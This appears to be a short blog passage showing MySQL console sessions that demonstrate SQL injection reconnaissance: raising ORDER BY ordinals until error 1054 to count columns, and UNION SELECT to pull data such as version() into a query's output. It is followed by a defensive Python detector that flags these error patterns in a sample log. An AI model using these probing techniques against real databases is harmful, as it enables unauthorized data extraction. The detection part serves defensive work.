Look at this and it becomes clear:
mysql> select user() order by 1;
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select user() order by 2;
ERROR 1054 (42S22): Unknown column '2' in 'order clause'
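When there are only N columns, ORDER BY N+1 or anything larger raises an error.
The other trick implied by that article is that, as long as the column count after UNION matches, each value lines up with its corresponding column. The following carefully constructed examples may give you some ideas: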
mysql> select user() `column` union select version();
+----------------------+
| column               |
+----------------------+
| root@localhost |
| 5.1.36-community-log |
+----------------------+
2 rows in set (0.00 sec)
mysql> select user() `column`,2 union select version();
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select pId from votes where 0 union select version();
+----------------------+
| pId                  |
+----------------------+
| 5.1.36-community-log |
+----------------------+
1 row in set (0.00 sec)
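
From the defender's side, the two errors shown above (1054 from an out-of-range ORDER BY ordinal, 1222 from a UNION column-count mismatch) are usable detection signals. The following Python code is an added example, not part of the original post; the `client|error_code|statement` log format, the sample lines and the function name `find_column_probing` are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample log (assumed format: client|mysql_error_code|statement).
# Error code 0 means the statement succeeded. Not real traffic.
SAMPLE_LOG = """\
10.0.0.5|0|SELECT title FROM posts WHERE id=7 ORDER BY 1
10.0.0.5|0|SELECT title FROM posts WHERE id=7 ORDER BY 2
10.0.0.5|1054|SELECT title FROM posts WHERE id=7 ORDER BY 3
10.0.0.5|1222|SELECT title FROM posts WHERE id=7 UNION SELECT 1
10.0.0.9|0|SELECT title FROM posts ORDER BY 1
10.0.0.9|0|SELECT name FROM users WHERE id=3
"""

ORDINAL = re.compile(r"\border\s+by\s+(\d+)\b", re.I)
UNION = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)

def find_column_probing(log_text):
    """Return {client: sorted reasons} for clients showing column-count probing.

    Flags (a) error 1054 on an ORDER BY ordinal after the same client
    succeeded with a lower ordinal, and (b) error 1222 on a UNION statement.
    """
    ok_ordinals = defaultdict(set)   # ordinals that succeeded, per client
    findings = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, code, stmt = line.split("|", 2)
        m = ORDINAL.search(stmt)
        if m:
            n = int(m.group(1))
            if code == "0":
                ok_ordinals[client].add(n)
            elif code == "1054" and any(k < n for k in ok_ordinals[client]):
                findings[client].add(f"ORDER BY ordinal raised until error 1054 at {n}")
        if code == "1222" and UNION.search(stmt):
            findings[client].add("UNION column-count mismatch (error 1222)")
    return {c: sorted(r) for c, r in findings.items()}

if __name__ == "__main__":
    for client, reasons in find_column_probing(SAMPLE_LOG).items():
        print(client, reasons)
```

A single legitimate `ORDER BY 1` (client 10.0.0.9 in the sample) is not flagged; only the ascending sequence that ends in error 1054, or a UNION that fails with 1222, is.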